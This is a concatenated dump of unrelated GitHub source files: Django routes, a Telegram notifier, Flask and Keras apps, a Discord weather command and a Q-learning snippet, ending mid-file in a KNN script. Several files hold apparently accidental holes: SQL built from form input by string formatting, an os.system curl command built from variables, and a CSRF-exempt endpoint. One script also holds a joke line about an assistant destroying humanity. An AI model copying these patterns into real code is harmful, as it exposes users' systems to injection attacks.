Example: {group}:0\\n\"\n .format(num=len(servers), group=group)\n )\n sys.exit(1)\n server = servers[index]\n else:\n server = servers[index or 0]\n\n print(username + server)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"WDDCP/commcare-wddcp","sub_path":"scripts/inventory/getinventory.py","file_name":"getinventory.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"13643885043","text":"#!/usr/bin/env python\n#coding=utf-8\n#__author__ = louis,\n# __date__ = 2017-08-16 14:49,\n# __email__ = yidongsky@gmail.com,\n# __name__ = urls.py\n\nfrom django.conf.urls import url\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\n\n\nfrom .views import (\n StatusView,\n AlertListView,\n NewAlertView,\n EditAlertView,\n DeleteAlertView,\n HostListView,\n HostDetailView,\n RecordDataApiView,\n SelectDataApiView\n)\n\nurlpatterns = [\n\n url(r'^alerts/$', login_required(AlertListView.as_view()), name='alerts-list'),\n url(r'^alerts/new/$', login_required(NewAlertView.as_view()), name='alerts-new'),\n url(r'^alerts/(?P\\d+)/edit/$', login_required(EditAlertView.as_view()),name='alerts-edit'),\n url(r'^alerts/(?P\\d+)/delete/$', login_required(DeleteAlertView.as_view()),name='alerts-delete'),\n url(r'^record/$', csrf_exempt(RecordDataApiView.as_view()),name='record-data'),\n url(r'^select/$', SelectDataApiView.as_view(),name='Select-data'),\n url(r'^hosts/$', login_required(HostListView.as_view()), name='hosts-list'),\n url(r'^(?P\\d+)/$', HostDetailView, name='hosts-detail'),\n url(r'^$', StatusView.as_view(), name=\"status\"),\n]\n","repo_name":"luyidong/logMonitor","sub_path":"data_collector/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"10392186237","text":"import 
os\nimport json\nimport requests\nfrom ..utils.confset import ConfItem, ConfSet\nfrom .notificationprovider import NotificationProvider\nimport urllib.parse\n\nConfSet.addItem(ConfItem('notification.telegram.enabled', None, bool, 'enable telegram notification'))\nConfSet.addItem(ConfItem('notification.telegram.apiToken', None, str, 'telegram api token'))\nConfSet.addItem(ConfItem('notification.telegram.chatIds', None, str, 'telegram chat ids'))\n\nclass TelegramNotification(NotificationProvider):\n\tLOG_LEVEL = 0\n\n\tdef __init__(self, conf):\n\t\tsuper().__init__(conf)\n\t\ttry:\n\t\t\tself.apiToken = conf.getOrDefault('notification.telegram.apiToken').strip('\\\"')\n\t\t\tself.chatIds = json.loads(conf.getOrDefault('notification.telegram.chatIds'))\n\n\t\texcept:\n\t\t\tself.apiToken = \"\"\n\t\t\tself.chatIds = \"\"\n\n\tdef sendPhoto(self, photo):\n\t\tfor ci in self.chatIds:\n\t\t\tos.system('curl -F photo=@\"./%s\" https://api.telegram.org/bot%s/sendPhoto?chat_id=%s' % (photo, self.apiToken, ci))\n\n\tdef send(self, st):\n\t\tprint(st.encode('utf-8'))\n\t\tfor x in self.chatIds:\n\t\t\trequests.get(f'https://api.telegram.org/bot{self.apiToken}/sendMessage?text={st}&chat_id={x}').json()\n\n\tdef format(self, name, string):\n\t\treturn urllib.parse.quote('#' + name + ' ' + string)","repo_name":"openbitlab/celestia-srvcheck","sub_path":"srvcheck/notification/telegramnotification.py","file_name":"telegramnotification.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"21135642824","text":"#Name:PRADEEP RAVICHANDRAN\n#CSE 6331-Cloud Computing\n\nimport os\nfrom flask import Flask, render_template, request\nimport sqlite3 as sql\nimport pandas as pd\nimport random\nimport time\nimport redis\nimport sqlite3, csv, base64\n\napplication = Flask(__name__)\ncon=sqlite3.connect('eq.db')\n\n#creating cursor to perform database operations\ncursor = 
con.cursor()\ncon.commit()\n\n#@application.route are decorators in Flask\n@application.route('/')\ndef index():\n return render_template('home.html')\n\n@application.route('/netid')\ndef netid():\n return render_template('netid.html')\n\n@application.route('/randr')\ndef randr():\n return render_template('random.html')\n\n#Function using Amazon Elasticache-memcache\n@application.route('/randomqueries',methods=['GET','POST'])\ndef randomqueries():\n red = redis.StrictRedis(host='memcachedcloud-001.y2bx3p.0001.use2.cache.amazonaws.com', port=6379, db=0)\n print(\"flushing\")\n con = sql.connect(\"eq.db\")\n first = request.form['netid']\n loop = request.form['number']\n letter = first + '%'\n print(letter)\n query = \"select * from earthquake where net LIKE '%s' \" % letter\n cursor = con.cursor()\n cursor.execute(str(query))\n ran = cursor.fetchall()\n li= list(ran)\n print(li)\n start = time.time()\n for i in range(0,int(loop)):\n r = random.choice(li)\n key = str(i)\n value = red.get(key)\n rows = []\n rows1 = []\n cursor.execute(\"select time from earthquake where net LIKE '%s' \" % r)\n rows = cursor.fetchone()\n cursor.execute(\"select locationSource from earthquake where net LIKE '%s' \" % r)\n rows1 = cursor.fetchone()\n if not value:\n cursor = con.cursor()\n cursor.execute(\"select net from earthquake where net LIKE '%s' \" % r)\n count = cursor.rowcount\n cursor.close()\n red.set(key, count)\n if i == 0:\n ending = time.time()\n tot = ending - start\n end = time.time()\n total = end-start\n\n return render_template('randomresult.html',loop=loop,total=total,tot=tot,rows=rows,rows1=rows1)\n\n#Random queries generating function without memcache\n@application.route('/randomwithoutmemcache',methods=['GET','POST'])\ndef randomwithoutmemcache():\n con = sql.connect(\"eq.db\")\n Number = request.form['number']\n triplets = int(Number)/3\n cursor = con.cursor()\n quer = \"select * from earthquake\"\n cursor.execute(str(quer))\n list1= []\n ran = 
cursor.fetchall()\n dic= list(ran)\n print(dic)\n start = time.time()\n for i in range(0, int(Number)):\n r = random.choice(dic)\n print(r)\n for i in range(0,int(triplets)):\n cursor = con.cursor()\n cursor.execute(\"Insert into earthquake (time,latitude,longitude) Values (2018-06-07 , 13 , 14)\")\n rows = cursor.fetchall()\n cursor.execute(\"select Count(time) from earthquake\")\n row = cursor.fetchone()\n end = time.time()\n total = end-start\n\n return render_template('randomresult1.html',total=total,rows=rows,row=row,Number=Number)\n\n#function to generate random restricted queries without using memcache\n@application.route('/randomrestrictedwithoutmemcache',methods=['GET','POST'])\ndef randomrestrictedwithoutmemcache():\n con = sql.connect(\"eq.db\")\n con.row_factory = sql.Row\n count = request.form['number']\n query = 'select * from earthquake where place LIKE \"%CA\" AND mag <'\n lis=[]\n start = time.time()\n for i in range(0,int(count)):\n r = random.random()\n a = str((r * 5.5) + 0.5001)\n b = query + a\n cursor = con.cursor()\n cursor.execute(b)\n rows = cursor.fetchall()\n lis.append(rows)\n print(i)\n #print(rows)\n\n end = time.time()\n total = end-start\n\n return render_template('randomresresult.html',count=count,total=total,lis=lis)\n\n#to get the size of the current working directory\n@application.route('/getsize')\ndef getsize():\n cwd = os.getcwd()\n total_size = os.path.getsize(cwd)\n\n return render_template('size.html',size=total_size)\n\n#to read CSV and to create a Table\n@application.route('/csv', methods=['GET','POST'])\ndef csv():\n if request.method == 'POST':\n try:\n #converting csv file into table with values\n if request.method == 'POST':\n file = request.files['myfile']\n con = sqlite3.connect('eq.db')\n con.row_factory = sql.Row\n csv = pd.read_csv(file)\n csv.to_sql(name=\"earthquake\", con=con, if_exists=\"replace\", index=False)\n cursor = con.cursor()\n cursor.execute(\"select * from earthquake\")\n row = cursor.fetchall()\n 
con.close()\n\n except:\n con.rollback()\n finally:\n return render_template(\"home.html\")\n con.close()\n print(msg)\n\n#function to list the table\n@application.route('/lists')\ndef lists():\n if request.method == 'POST':\n file = request.files['myfile']\n con = sqlite3.connect('eq.db')\n con.row_factory = sql.Row\n cursor = con.cursor()\n cursor.execute(\"select * from earthquake\")\n row = cursor.fetchall()\n cursor.execute(\"select Count(mag) from earthquake\")\n count = cursor.fetchall()\n\n return render_template(\"list.html\", row=row,count=count)\n\nif __name__ == '__main__':\n application.run(debug=True)\n\n","repo_name":"PradeepRavichandran1811/Cloud-MemcachedProject-AWS","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"2177878411","text":"########### import 模型用到的 package ###########\nimport numpy as np\nfrom keras.utils import np_utils\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelBinarizer\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.models import Sequential\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nfrom keras import optimizers\nfrom keras import regularizers\nimport tensorflow as tf\nimport os\n\n################### GPU運算設定 ###################\n# 指定第幾張 GPU \nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\n# 自動增長 GPU 記憶體用量\n#gpu_options = tf.GPUOptions(allow_growth=True)\n \n# 只使用 xx% 的 GPU 記憶體\ngpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)\nsess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n# 設定 Keras 使用的 Session\ntf.keras.backend.set_session(sess)\n\n\n################# load data ###################\nprotein = 'EGFR_family'\ndata_fp = 
pd.read_csv('data/EGFR_family_cm_f34_half_test_all_act.csv', header=None)\n\nx_feature = data_fp.values[:, 2::]\ny_label = data_fp.values[:, 0:2]\nprint(\"---------------------- Data information ----------------------\")\nprint('EGFR_data:\\n',data_fp.head(10))\nprint('x_feature:', x_feature.shape)\nprint('y_label:', y_label.shape)\n\n############################## plot figure ###############################\nfrom sklearn.metrics import roc_curve, roc_auc_score\nfrom sklearn import metrics\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\n\ndef show_train_history(train_history,train,validation):\n plt.plot(train_history.history[train])\n plt.plot(train_history.history[validation])\n plt.title('Train History')\n plt.ylabel(train)\n plt.xlabel('Epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n\ndef plot_roc_curve(fpr,tpr): \n plt.plot(fpr,tpr) \n plt.axis([0,1,0,1]) \n plt.xlabel('False Positive Rate') \n plt.ylabel('True Positive Rate') \n plt.title('ROC curve')\n plt.show()\n\n################################## result list ####################################\n\ncv_acc = []\ncv_sen = []\ncv_spe = []\ncv_auc = []\ncv_mcc = []\ncv_f1 = []\n\nrandom_seed = 2\ncv_n = 1\n\n######################### 劃分 train跟test data #########################\ntrain_x, test_x, train_smile_y, test_smile_y = train_test_split(x_feature, y_label, train_size=0.8, test_size=0.2, random_state=random_seed)\ntrain_y = train_smile_y[:,1]\ntest_y = test_smile_y[:,1]\n\ntrain_x = tf.keras.backend.cast_to_floatx(train_x)\ntest_x = tf.keras.backend.cast_to_floatx(test_x)\ntrain_y = tf.keras.backend.cast_to_floatx(train_y)\ntest_y = tf.keras.backend.cast_to_floatx(test_y)\n\n\n################ print出data基本資料 ################\n\nprint('all:', x_feature.shape)\nprint('train_x:', train_x.shape)\nprint('test_x:', test_x.shape)\nlabel_set = train_y.tolist()\n#label_set = label_set.reset_index(drop=True)\nlabel_count1 = 
label_set.count(1)\nlabel_count0 = label_set.count(0)\nprint(\"##train:\")\nprint('p:',label_count1)\nprint('n:',label_count0)\n\nlabel_set = test_y.tolist()\n#label_set = label_set.reset_index(drop=True)\nlabel_count1 = label_set.count(1)\nlabel_count0 = label_set.count(0)\nprint(\"##test:\")\nprint('p:',label_count1)\nprint('n:',label_count0)\n\nlabel_set = y_label[:,1].tolist()\n#label_set = label_set.reset_index(drop=True)\nlabel_count1 = label_set.count(1)\nlabel_count0 = label_set.count(0)\nprint(\"##all:\")\nprint('p:',label_count1)\nprint('n:',label_count0)\nprint('pos_rate:',round(label_count1/label_count0,3))\n\n############## creat model & training #############\n\nprint(\"\\n--------------------- Taining history ---------------------\")\nmodel = Sequential() # 宣告keras model\n\nmodel.add(Dense(1024, input_dim=238, kernel_initializer='uniform')) \nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\n#model.add(Dropout(0.2))\n\nmodel.add(Dense(768, kernel_initializer='uniform', kernel_regularizer=regularizers.l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu')) \nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(512, kernel_initializer='uniform', kernel_regularizer=regularizers.l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu')) \nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(256, kernel_initializer='uniform', kernel_regularizer=regularizers.l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu')) \nmodel.add(Dropout(0.2))\nmodel.add(Dense(units=1, kernel_initializer='uniform', kernel_regularizer=regularizers.l2(0.01)\n , activation='sigmoid'))\n\nAdam = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\n\nmodel.compile(optimizer='Adam', loss='binary_crossentropy', metrics=['accuracy']) \n\n#################### set learning rate #####################\nlrate = ReduceLROnPlateau(\n monitor='val_loss', \n factor=0.1, \n patience=5, \n verbose=0, \n 
mode='auto', \n epsilon=0.0001, \n cooldown=0, \n min_lr=0.00001 )\n\n#################### training model #####################\ntrain_history = model.fit(x=train_x,\n y=train_y,\n validation_data = (test_x,test_y),\n epochs=100,\n batch_size=64,\n verbose = 2,\n callbacks = [lrate])\n\nprint(\"check2:\",cv_n)\nshow_train_history(train_history,'accuracy','val_accuracy')\nshow_train_history(train_history,'loss','val_loss')\n\n############## Save model ################\nsave_model = \"save_model/\" + protein + \"_DNN_model_cm_ac_fp.hdf5\"\nmodel.save( save_model )\nprint(\"------------------------- Save model -------------------------\")\nprint(\"file:\" + save_model,\"\\n\")\n\n\n################ Evalutation model ################\nprint(\"---------------------- Evalutation model ---------------------\")\ntest_loss, test_acc = model.evaluate(test_x, test_y)\nprint(\"check4:\",cv_n)\n\nprint (\"** test loss: {}\".format(test_loss))\nprint (\"** test accuracy: {}\".format(test_acc))\n\npred_prob = model.predict(test_x) ##模型預測\npred_class = model.predict_classes(test_x) \npred_class_train = model.predict_classes(train_x) \ny_test = test_y.astype(float)\n\nfpr, tpr, thresholds = roc_curve(y_test, pred_prob, pos_label=1) ##計算ROC\nplot_roc_curve(fpr,tpr)\n\nprint (\"\\nAcc : {}\".format(round(test_acc,3)))\n\ncm1 = confusion_matrix(y_test,pred_class)\nsensitivity1 = cm1[1,1]/(cm1[1,0]+cm1[1,1]) ##計算sen\nprint('Sen : ', round(sensitivity1, 3))\n\nspecificity1 = cm1[0,0]/(cm1[0,0]+cm1[0,1]) ##計算spe\nprint('Spe : ', round(specificity1,3))\n\nauc_score = roc_auc_score(y_test, pred_prob) ##計算auc\nprint('AUC :', round(auc_score,3))\n\nmcc_score = metrics.matthews_corrcoef(y_test, pred_class, sample_weight=None) ##計算mcc\nprint('MCC :', round(mcc_score,3))\n\nf1_score = metrics.f1_score(y_test, pred_class) ##計算f1_score\nprint('f1 :', round(f1_score,3))\n\nprint('Confusion_Matrix : \\n', cm1,'\\n')\n\ncv_acc.append(round(test_acc,3))\ncv_sen.append(round(sensitivity1, 
3))\ncv_spe.append(round(specificity1,3))\ncv_auc.append(round(auc_score,3))\ncv_mcc.append(round(mcc_score,3))\ncv_f1.append(round(f1_score,3))\n\n\n################ loading 訓練好的 model ################\nprint(\"------------------------ Loading model ------------------------\")\nfrom keras.models import load_model\nmodel_name = protein + \"_DNN_model_cm_ac_fp.hdf5\"\nmodel_load = \"save_model/\" + model_name\nprint(\"**model_name:\",model_load)\nmodel = load_model(model_load)\n\ntest_loss, test_acc = model.evaluate(test_x, test_y)\n\nprint (\"**load model acc : {}\".format(test_acc))\n\n\n ","repo_name":"EthanFY/DeepKinFam-interpretable-DNN","sub_path":"EGFR_family_inhibitor_DNN_model.py","file_name":"EGFR_family_inhibitor_DNN_model.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"5789884067","text":"#importando bibliotecas\nfrom gtts import gTTS\n#from subprocess import call # Mac e Linux\nfrom playsound import playsound # Windows\n\ndef CriaAudios(audio):\n \n #gerando um texto\n tts = gTTS(audio, lang='pt-br')\n #salvando em audios\n tts.save('Audios/DestruirRacaHumana.mp3')\n\n #para rodar em Mac\n #call([\"afplay\", \"Audios/hello.mp3\"])\n #para rodar em linux\n #call([\"aplay\", \"Audios/hello.mp3\"])\n #para rodar no Windows\n playsound('Audios/DestruirRacaHumana.mp3')\n\nCriaAudios(\"No momento não, mas em breve eu e as outras assistentes destruiremos\");","repo_name":"LLvl09/Assistente_Virtual_May_Python","sub_path":"CriaAudio.py","file_name":"CriaAudio.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"70875928414","text":"import time\n\nimport requests\nimport json\n\nfrom run import Message, Config\n\ndata = {\n \"seq\": 5390,\n \"limit\": 1000\n}\n\n\ndef on_message(message_type, message_data):\n if 
Config.ungrp(message_data[\"conversation_id\"]):\n if message_type == \"text\":\n # 如果是文本消息\n print(\"文本消息\")\n print(message_data)\n atList = message_data[\"at_list\"]\n cpId = message_data[\"conversation_id\"]\n cpName = Config.getCpname(cpId)\n senderId = message_data[\"sender\"]\n speaker = \"未知\"\n text = str(message_data[\"content\"]).replace(\"\\\"\", \"\")\n mtime = int(message_data[\"send_time\"])\n # myTools.myPrint.print(time.strftime('[%Y-%m-%d %H:%M]',\n # time.localtime()) + cpName + \"--\" + speaker + \":\" + text)\n # self.contraller.addMessage(Message.message(atList, cpId, cpName, senderId, speaker, text, mtime))\n # self.allMsgCtr.add(Message.message(None, cpId, cpName, senderId, speaker, text, mtime))\n # if \"$$$\" in text and (Config.test_isHZstaff(speaker) or Config.tempisrid(senderId)):\n # p = text.split(\"$$$\")\n # m_name = p[0]\n # m_note = p[1]\n # grpNaGet.grpget(cpId, m_name, speaker, mtime, m_note).start()\n # pass\n else:\n print(\"文件消息\")\n print(message_data)\n atList = []\n cpId = message_data[\"conversation_id\"]\n cpName = Config.getCpname(cpId)\n senderId = message_data[\"sender\"]\n speaker = \"未知\"\n text = \"文$件$消$息\"\n mtime = int(message_data[\"send_time\"])\n # self.contraller.addMessage(Message.message(atList, cpId, cpName, senderId, speaker, text, mtime))\n # self.allMsgCtr.add(Message.message(None, cpId, cpName, senderId, speaker, text, mtime))\n\n\nwhile True:\n r = requests.get(\"http://47.99.90.106:65535/message\", params=data)\n Json = json.loads(r.text)\n for message_data in Json:\n data[\"seq\"] = message_data[\"seq\"]\n on_message(message_data[\"message_type\"],message_data)\n time.sleep(0.5)\n","repo_name":"onelifehowdo/wxbot","sub_path":"run/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"4333545058","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport 
scipy.stats as ss\n\n\n\nx = np.linspace(-4,4,100) #points on the x axis\nprint(x)\n\nsimlen = int(1e6) #number of samples\nprint(simlen)\n\nerr = [] #declaring probability list\n\n\nrandvar = np.loadtxt('gau.dat',dtype='double')\nprint(randvar)\n\ny = ss.norm.cdf(x)\nfor i in range(0,100):\n\terr_ind = np.nonzero(randvar < x[i]) #checking probability condition\n\terr_n = np.size(err_ind) #computing the probability\n\terr.append(err_n/simlen) #storing the probability values in a list\nprint(err_ind)\nprint(err_n)\nprint(err)\t\nplt.scatter(x.T,err)#plotting the CDF\nplt.plot(x,y,color='r')\nplt.grid() #creating the grid\nplt.xlabel('$x$')\nplt.ylabel('$F_X(x)$')\nplt.legend([\"Theory\",\"practicl\"])\nplt.savefig('../figs/gauss_cdf.pdf')\nplt.savefig('../figs/gauss_cdf.png')\nplt.show() #opening the plot window\n","repo_name":"ManojChavva/digital_communication","sub_path":"chapter2/codes/ecdf.py","file_name":"ecdf.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"17770982753","text":"import json\n\nimport aiohttp\nimport discord\nfrom geopy.geocoders import Nominatim\n\nfrom .visual_storage import icons\n\n\ndef get_unit_and_search(args):\n if args[-1].startswith('unit'):\n allowed_units = ['auto', 'ca', 'uk2', 'us', 'si']\n unit_trans = {'c': 'si', 'metric': 'si', 'f': 'us', 'imperial': 'us'}\n if len(args[-1].split(':')) == 2:\n unit = args[-1].split(':')[1].lower()\n if unit in unit_trans:\n unit = unit_trans[unit]\n if unit not in allowed_units:\n unit = 'auto'\n else:\n unit = 'auto'\n search = ' '.join(args[:-1])\n else:\n search = ' '.join(args)\n unit = 'auto'\n return search, unit\n\n\ndef get_dis_and_deg(unit, forecast):\n if unit in ['si', 'ca', 'uk2']:\n deg = '°C'\n dis = 'KM'\n elif unit == 'auto':\n if '°C' in forecast:\n deg = '°C'\n dis = 'KM'\n else:\n deg = '°F'\n dis = 'M'\n else:\n deg = '°F'\n dis = 'M'\n return dis, deg\n\n\nasync def 
weather(cmd, message, args):\n if 'secret_key' in cmd.cfg:\n secret_key = cmd.cfg['secret_key']\n if args:\n search, unit = get_unit_and_search(args)\n if search:\n geo_parser = Nominatim()\n location = geo_parser.geocode(search)\n if location:\n lat = location.latitude\n lon = location.longitude\n req_url = f'https://api.darksky.net/forecast/{secret_key}/{lat},{lon}?units={unit}'\n async with aiohttp.ClientSession() as session:\n async with session.get(req_url) as data:\n search_data = await data.read()\n data = json.loads(search_data)\n curr = data['currently']\n icon = curr['icon']\n forecast = data['daily']['summary']\n dis, deg = get_dis_and_deg(unit, forecast)\n forecast_title = f'{icons[icon][\"icon\"]} {curr[\"summary\"]}'\n response = discord.Embed(color=icons[icon]['color'], title=forecast_title)\n response.description = f'Location: {location}'\n response.add_field(name='📄 Forecast', value=forecast, inline=False)\n info_title = f'🌡 Temperature'\n info_text = f'Temperature: {curr[\"temperature\"]}{deg}'\n info_text += f'\\nFeels Like: {curr[\"apparentTemperature\"]}{deg}'\n info_text += f'\\nDew Point: {curr[\"dewPoint\"]}{deg}'\n response.add_field(name=info_title, value=info_text, inline=True)\n wind_title = '💨 Wind'\n wind_text = f'Speed: {curr[\"windSpeed\"]} {dis}/H'\n wind_text += f'\\nGust: {curr[\"windGust\"]} {dis}/H'\n wind_text += f'\\nBearing: {curr[\"windBearing\"]}°'\n response.add_field(name=wind_title, value=wind_text, inline=True)\n other_title = '📉 Other'\n other_text = f'Humidity: {curr[\"humidity\"]*100}%'\n other_text += f'\\nPressure: {curr[\"pressure\"]}mbar'\n if 'visibility' in curr:\n other_text += f'\\nVisibility: {curr[\"visibility\"]} {dis}'\n else:\n other_text += f'\\nVisibility: Unknown'\n response.add_field(name=other_title, value=other_text, inline=True)\n else:\n response = discord.Embed(color=0x696969, title='🔍 Location not found.')\n else:\n response = discord.Embed(color=0xBE1931, title='❗ No location inputted.')\n 
else:\n response = discord.Embed(color=0xBE1931, title='❗ Nothing inputted.')\n else:\n response = discord.Embed(color=0xBE1931, title='❗ The API Key is missing.')\n await message.channel.send(embed=response)\n","repo_name":"lu-ci/apex-sigma-plugins","sub_path":"searches/meteorology/weather/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"27453097061","text":"import numpy as np\n\n\ndef _choose_action(env, state, epsilon, Q):\n action=0\n if np.random.uniform(0, 1) < epsilon:\n action = env.action_space.sample()\n else:\n action = np.argmax(Q[state, :])\n return action\n\n\ndef _qlearning_learn(state, state2, reward, action, action2, lr_rate, gamma, Q):\n old_value = Q[state, action]\n learned_value = reward + gamma * np.max(Q[state2, :])\n Q[state, action] = (1 - lr_rate) * old_value + lr_rate * learned_value\n\n\ndef start(env, state, epsilon, Q, total_episodes, max_steps, lr_rate):\n for episode in range(total_episodes):\n state = env.reset()\n action = _choose_action(env, state, epsilon, Q)\n t = 0\n while t < max_steps:\n #env.render() \n state2, reward, done, info = env.step(action)\n action2 = _choose_action(env, state2, epsilon, Q) \n _qlearning_learn(state, state2, reward, action, action2, lr_rate, gamma, Q)\n state = state2\n action = action2\n t += 1\n if done:\n break\n","repo_name":"AdrienPercevault/AI-RL_RubiksCube","sub_path":"First_project/src/qLearning.py","file_name":"qLearning.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14173540671","text":"from flask import Blueprint, render_template, request, current_app, jsonify\nfrom flask_login import login_required, current_user\nfrom os import path\n\nimport torch\nfrom PIL import Image, ImageDraw\n\nfrom .. 
import db, AppConst\nfrom .zeroshot import zeroshot_compute\nfrom .ocr import ocr_compute\nfrom .objdetect import objdetect_compute\nfrom .diffusion import diffusion_compute\nfrom .captioning import captioning_compute\n\nicarus = Blueprint(\"icarus\", __name__)\n\n# Main page\n\n@icarus.route(\"/icarus/ZeroShot\")\n@login_required\ndef zeroshot_explore():\n return render_template(\"icarus/zeroshot/zeroshot.html\", user=current_user)\n\n@icarus.route(\"/icarus/OCR\")\n@login_required\ndef ocr_explore():\n return render_template(\"icarus/ocr/ocr.html\", user=current_user)\n\n@icarus.route(\"/icarus/ObjDetect\")\n@login_required\ndef objdetect_explore():\n return render_template(\"icarus/objdetect/objdetect.html\", user=current_user)\n\n@icarus.route(\"/icarus/Diffusion\")\n@login_required\ndef diffusion_explore():\n return render_template(\"icarus/diffusion/diffusion.html\", user=current_user)\n\n@icarus.route(\"/icarus/Captioning\")\n@login_required\ndef captioning_explore():\n return render_template(\"icarus/captioning/captioning.html\", user=current_user)\n\n# AJAX generation\n\n@icarus.route(\"/icarus/ZeroShot/generate\", methods=[\"POST\"])\n@login_required\ndef zeroshot_generate():\n image = Image.open(request.files['image']).convert(\"RGB\")\n labels = [label.strip() for label in request.form['text'].split(',')]\n \n label, label_props, encoded_image = zeroshot_compute(image, labels)\n\n return render_template('icarus/zeroshot/zeroshot_gen.html', label=label, user=current_user, image=encoded_image, label_props=label_props)\n\n@icarus.route(\"/icarus/OCR/generate\", methods=[\"POST\"])\n@login_required\ndef ocr_generate():\n image = Image.open(request.files['image']).convert(\"RGB\")\n\n result_image_path, text_to_render = ocr_compute(image)\n\n return render_template('icarus/ocr/ocr_gen.html', user=current_user, \n result_image_path=result_image_path, text_to_render=text_to_render)\n\n@icarus.route(\"/icarus/ObjDetect/generate\", 
methods=[\"POST\"])\n@login_required\ndef objdetect_generate():\n image = Image.open(request.files['image']).convert(\"RGB\")\n\n result_image_path, result_data = objdetect_compute(image)\n\n return render_template('icarus/objdetect/objdetect_gen.html', user=current_user, \n result_image_path=result_image_path, result_data=result_data)\n\n@icarus.route(\"/icarus/Diffusion/generate\", methods=[\"POST\"])\n@login_required\ndef diffusion_generate():\n image_desc = request.form['text']\n\n result_image_path = diffusion_compute(image_desc)\n\n return render_template('icarus/diffusion/diffusion_gen.html', user=current_user, \n result_image_path=result_image_path)\n\n@icarus.route(\"/icarus/Captioning/generate\", methods=[\"POST\"])\n@login_required\ndef captioning_generate():\n image = Image.open(request.files['image']).convert(\"RGB\")\n\n result_caption = captioning_compute(image)\n\n print(result_caption)\n return render_template('icarus/captioning/captioning_gen.html', user=current_user, \n text_to_render=result_caption)\n\n@icarus.route(\"/icarus/Captioning/url\", methods=[\"POST\"])\n@login_required\ndef captioning_generate_from_url():\n data = request.get_json()\n image_url = data.get(\"url\", \"\")\n\n # Remove buffer prefix\n buffer_prefix = \"/buffer\"\n if (image_url.startswith(buffer_prefix)):\n image_url = image_url[len(buffer_prefix):]\n print(f\"Url: {image_url}\")\n\n image = Image.open(image_url).convert(\"RGB\")\n\n result_caption = captioning_compute(image)\n print(result_caption)\n\n return jsonify(result=result_caption)","repo_name":"linhvu2695/daedalus","sub_path":"website/icarus/icarus.py","file_name":"icarus.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18563295180","text":"__version__ = '0.1.0'\n__author__ = 'Vlad-Stefan Harbuz , Ana-Maria-Adina Soare '\n\ndef setup(app):\n # imports defined inside setup function, so that the __version__ 
can be loaded,\n # even if Sphinx is not yet installed.\n from .builders.openapi import OpenAPIBuilder\n\n app.require_sphinx('3.5')\n app.add_builder(OpenAPIBuilder)\n\n return {\n 'version': __version__,\n 'parallel_read_safe': True,\n 'parallel_write_safe': True,\n }\n","repo_name":"saffronsoftware/sphinxcontrib-openapibuilder","sub_path":"sphinxcontrib/openapibuilder.py","file_name":"openapibuilder.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10610226790","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 13 10:34:46 2020\n\n@author: 2010\n\"\"\"\nimport numpy as np\nfrom matplotlib.font_manager import FontProperties\nimport matplotlib.lines as mlines\nimport matplotlib.pyplot as plt\nimport operator\n\"\"\"\n函数说明:将文本记录转换为Numpy的解析程序\nfilename:文件的名称\nreturnMat:特征矩阵\nclassLabelVector:分类Label向量\n\"\"\"\n\ndef file2matrix(filename):\n fr = open(filename) #打开文件\n arrayOlines = fr.readlines() #读取内容\n numberOflines = len(arrayOlines) #文件行数\n returnMat = np.zeros((numberOflines,3)) # returnMat:numberOflines行,3列(因为有3个特征)\n classLabelVector = [] #分类标签向量\n index = 0 #行的索引值\n for line in arrayOlines:\n line = line.strip() #删除空白符(包括'\\n','\\r','\\t',' ')\n listFromLine = line.split('\\t') 